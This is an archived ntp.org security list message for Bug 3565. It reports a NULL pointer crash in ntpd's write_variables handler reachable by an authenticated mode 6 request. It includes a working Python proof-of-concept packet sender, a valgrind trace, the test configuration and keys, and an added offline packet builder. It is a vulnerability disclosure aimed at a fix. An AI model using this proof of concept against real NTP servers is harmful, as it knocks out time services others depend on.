[ntp:security] [Bug 3565] test

bugzilla-daemon at ntp.org bugzilla-daemon at ntp.org
Tue Jan 15 23:49:51 UTC 2019


http://bugs.ntp.org/show_bug.cgi?id=3565

Harlan Stenn <stenn at ntp.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
           Priority|P5                          |P2
                 CC|                            |magnus at stubman.eu
              Flags|                            |blocking4.2.8+
           Severity|enhancement                 |major

--- Comment #1 from Harlan Stenn <stenn at ntp.org> 2019-01-15 23:49:51 UTC ---
An authenticated attacker can cause ntpd to SIGSEGV by triggering a NULL
pointer exception.

Embargo offered until 15 April 2019.

Proof of concept:

#!/usr/bin/env python
import socket

# 36-byte NTP mode 6 (control) request as captured: 0x16 = LI 0, VN 2, mode 6;
# 0x03 = opcode 3 (CTL_OP_WRITEVAR); sequence 3; status, associd and offset 0;
# count 4; data "leap" (a bare name, no "=value"); then the MAC: key id 1
# and the 16-byte MD5 digest for that key. Bytes literal: works on Python 2 and 3.
buf = (b"\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
       b"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
       b"\x56\xc8\x07\xd4")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))

Crash report:

$ sudo valgrind ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
==21159== Memcheck, a memory error detector
==21159== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==21159== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==21159== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
==21159== 
15 Jan 21:17:45 ntpd[21159]: ntpd 4.2.8p12 at 1.3728-o Tue Jan 15 12:39:50 UTC 2019 (1): Starting
15 Jan 21:17:45 ntpd[21159]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
15 Jan 21:17:45 ntpd[21159]: proto: precision = 1.338 usec (-19)
15 Jan 21:17:45 ntpd[21159]: switching logging to file /tmp/ntp.log
15 Jan 21:17:46 ntpd[21159]: Listen and drop on 0 v6wildcard [::]:123
15 Jan 21:17:46 ntpd[21159]: Listen and drop on 1 v4wildcard 0.0.0.0:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 2 lo 127.0.0.1:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 3 eth0 192.168.245.230:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 4 lo [::1]:123
15 Jan 21:17:46 ntpd[21159]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123
15 Jan 21:17:46 ntpd[21159]: Listening on routing socket on fd #22 for interface updates
15 Jan 21:17:46 ntpd[21159]: kernel reports TIME_ERROR: 0x41: Clock Unsynchronized
15 Jan 21:17:46 ntpd[21159]: kernel reports TIME_ERROR: 0x41: Clock Unsynchronized
==21159== Invalid read of size 1
==21159==    at 0x133E60: write_variables (ntp_control.c:3467)
==21159==    by 0x147539: receive (ntp_proto.c:690)
==21159==    by 0x12C8CD: ntpdmain (ntpd.c:1442)
==21159==    by 0x5FE4B44: (below main) (libc-start.c:287)
==21159==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==21159== 
==21159== 
==21159== Process terminating with default action of signal 11 (SIGSEGV)
==21159==  Access not within mapped region at address 0x0
==21159==    at 0x133E60: write_variables (ntp_control.c:3467)
==21159==    by 0x147539: receive (ntp_proto.c:690)
==21159==    by 0x12C8CD: ntpdmain (ntpd.c:1442)
==21159==    by 0x5FE4B44: (below main) (libc-start.c:287)
==21159==  If you believe this happened as a result of a stack
==21159==  overflow in your program's main thread (unlikely but
==21159==  possible), you can try to increase the size of the
==21159==  main thread stack using the --main-stacksize= flag.
==21159==  The main thread stack size used in this run was 204800.
==21159== 
==21159== HEAP SUMMARY:
==21159==     in use at exit: 120,503 bytes in 2,646 blocks
==21159==   total heap usage: 2,785 allocs, 139 frees, 397,278 bytes allocated
==21159== 
==21159== LEAK SUMMARY:
==21159==    definitely lost: 0 bytes in 0 blocks
==21159==    indirectly lost: 0 bytes in 0 blocks
==21159==      possibly lost: 3,134 bytes in 4 blocks
==21159==    still reachable: 117,369 bytes in 2,642 blocks
==21159==         suppressed: 0 bytes in 0 blocks
==21159== Rerun with --leak-check=full to see details of leaked memory
==21159== 
==21159== For counts of detected and suppressed errors, rerun with: -v
==21159== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)

Configuration:

$ cat ~/resources/ntp.conf 
logfile /tmp/ntp.log
restrict 127.0.0.1
keys /home/magnus/resources/keys
trustedkey 1
controlkey 1
requestkey 1

$ cat /home/magnus/resources/keys 
1 M gurka
2 M agurk

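The request the proof of concept sends, decoded and rebuilt in code so the
header fields and the MAC can be inspected rather than read off a hex string.
This is an added example for this page, not the reporter's script and not ntpd
code. It assumes the classic NTP symmetric-key MAC layout (a 4-byte key id
followed by MD5 over key || packet) and a key table constructed to match the
keys file shown above. split_assignments is the example's own helper for the
"name=value,..." syntax of mode 6 data, not ntpd's parser; it makes visible
that the captured request carries the bare name "leap" with no value, the data
write_variables (ntp_control.c:3467 in the trace above) was handling when ntpd
crashed. The check it adds is that a valid MAC only proves the sender holds the
control key; it says nothing about whether the data is well formed.

```python
#!/usr/bin/env python3
"""Build, parse and authenticate NTP mode 6 (control) requests offline.

Added example for Bug 3565; not the reporter's script and not ntpd code.
Layout: 12-byte control header (RFC 1305 App. B / ntp_control.h), data padded
to 4 bytes, then an optional MAC of 4-byte key id + MD5(key || packet), the
classic symmetric-key ("M") scheme assumed here.
"""
import hashlib
import hmac
import struct

NTP_VERSION = 2         # the captured request uses VN=2
MODE_CONTROL = 6
CTL_OP_READVAR = 2
CTL_OP_WRITEVAR = 3     # opcode in the captured request; handled by write_variables()

# LI/VN/mode, R/E/M/opcode, sequence, status, associd, offset, count
CTL_HEADER = struct.Struct("!BBHHHHH")
MAC_LEN = 4 + 16        # key id + MD5 digest

# Constructed key table mirroring the page's keys file ("1 M gurka", "2 M agurk").
KEYS = {1: b"gurka", 2: b"agurk"}

# First 16 bytes of the captured PoC: header plus the data "leap" (MAC omitted).
POC_HEADER_AND_DATA = bytes.fromhex("160300030000000000000004" "6c656170")


def build_control_packet(opcode, data, sequence=0, associd=0, key_id=None, key=None):
    """Return a mode 6 request; with a key, append key_id + MD5(key || packet)."""
    count = len(data)
    padded = data + b"\x00" * (-count % 4)        # pad data to a 4-byte boundary
    header = CTL_HEADER.pack(
        (NTP_VERSION << 3) | MODE_CONTROL,         # 0x16: LI=0, VN=2, mode=6
        opcode & 0x1F,                             # R=E=M=0, opcode in the low 5 bits
        sequence, 0, associd, 0, count)
    packet = header + padded
    if key is not None:
        packet += struct.pack("!I", key_id) + hashlib.md5(key + packet).digest()
    return packet


def parse_control_packet(packet):
    """Split a mode 6 packet into header fields, data and trailing MAC."""
    if len(packet) < CTL_HEADER.size:
        raise ValueError("short control packet")
    li_vn_mode, rem_op, seq, status, associd, offset, count = CTL_HEADER.unpack_from(packet)
    body_end = CTL_HEADER.size + count + (-count % 4)
    if body_end > len(packet):
        raise ValueError("count field exceeds packet length")
    mac = packet[body_end:]
    return {
        "version": (li_vn_mode >> 3) & 0x7,
        "mode": li_vn_mode & 0x7,
        "response": bool(rem_op & 0x80),
        "error": bool(rem_op & 0x40),
        "more": bool(rem_op & 0x20),
        "opcode": rem_op & 0x1F,
        "sequence": seq, "status": status, "associd": associd,
        "offset": offset, "count": count,
        "data": packet[CTL_HEADER.size:CTL_HEADER.size + count],
        "authenticated_len": body_end,            # bytes covered by the MAC
        "key_id": struct.unpack("!I", mac[:4])[0] if len(mac) == MAC_LEN else None,
        "mac": mac,
    }


def verify_mac(packet, keys):
    """True only if the packet carries a known key id and a matching MD5 MAC."""
    fields = parse_control_packet(packet)
    key = keys.get(fields["key_id"])
    if key is None or len(fields["mac"]) != MAC_LEN:
        return False
    expected = hashlib.md5(key + packet[:fields["authenticated_len"]]).digest()
    return hmac.compare_digest(expected, fields["mac"][4:])


def split_assignments(data):
    """Split mode 6 data 'a=1,b=2,c' into [('a','1'),('b','2'),('c',None)].

    Own helper, not ntpd's parser: a name without '=' yields value None, which
    is exactly what the captured request carries ("leap" alone).
    """
    out = []
    for item in data.decode("ascii", "replace").split(","):
        item = item.strip()
        if item:
            name, sep, value = item.partition("=")
            out.append((name.strip(), value.strip() if sep else None))
    return out


def main():
    request = build_control_packet(CTL_OP_WRITEVAR, b"leap", sequence=3,
                                   key_id=1, key=KEYS[1])
    assert request[:16] == POC_HEADER_AND_DATA   # same header and data as the PoC
    fields = parse_control_packet(request)
    print("opcode=%d seq=%d data=%r mac ok=%s" % (
        fields["opcode"], fields["sequence"], fields["data"], verify_mac(request, KEYS)))
    print("assignments:", split_assignments(fields["data"]))
    # A valid MAC proves the sender holds the control key, not that the data is
    # well formed; tampering with the data, however, is detected.
    tampered = request[:12] + b"peal" + request[16:]
    print("tampered mac ok=%s" % verify_mac(tampered, KEYS))


if __name__ == "__main__":
    main()
```

Run it with no arguments; it never touches the network. The comparison in main
checks only the first 16 bytes against the page's capture, because the digest
in the capture depends on the MAC scheme ntpd used and is not recomputed here.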